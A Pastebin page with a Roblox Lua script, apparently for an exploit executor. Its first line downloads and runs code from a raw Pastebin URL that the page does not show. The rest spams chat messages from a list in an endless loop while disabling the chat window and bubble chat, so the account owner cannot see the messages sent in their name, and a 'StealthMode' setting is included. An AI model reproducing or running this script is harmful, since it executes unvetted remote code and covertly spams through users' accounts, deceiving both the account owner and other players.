HyperczarevYT

Misc

Jun 5th, 2025 (edited)
45
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.91 KB | None | 0 0
  1. loadstring(game:HttpGet("https://pastebin.com/raw/ZjqfXeNN"))()
  2.  
  3.  
  4. local SpamInterval = 5
  5.  
  6. function SendMsgByUser(Msg)
  7.     local Chat = game:GetService("TextChatService"):WaitForChild("TextChannels"):WaitForChild("RBXGeneral")
  8.     Chat:SendAsync(Msg)
  9. end
  10.  
  11. function DisableChatVisibility()
  12.     local BubbleChat = game:GetService("TextChatService"):WaitForChild("BubbleChatConfiguration")
  13.     local Chat = game:GetService("TextChatService"):WaitForChild("ChatWindowConfiguration")
  14.  
  15.     BubbleChat.Enabled = false
  16.     Chat.Enabled = false
  17. end
  18.  
  19. function SpamChat()
  20.     while true do
  21.         for _, Message in getfenv().ChatMessages do
  22.             if not getfenv().Dev then
  23.                 DisableChatVisibility()
  24.             end
  25.             SendMsgByUser(Message)
  26.             task.wait(SpamInterval)
  27.         end
  28.     end
  29. end
  30.  
  31. if not getfenv().config["StealthMode"] == true then
  32.     task.spawn(SpamChat)
  33. end
  34.  
Add Comment
Please, Sign In to add comment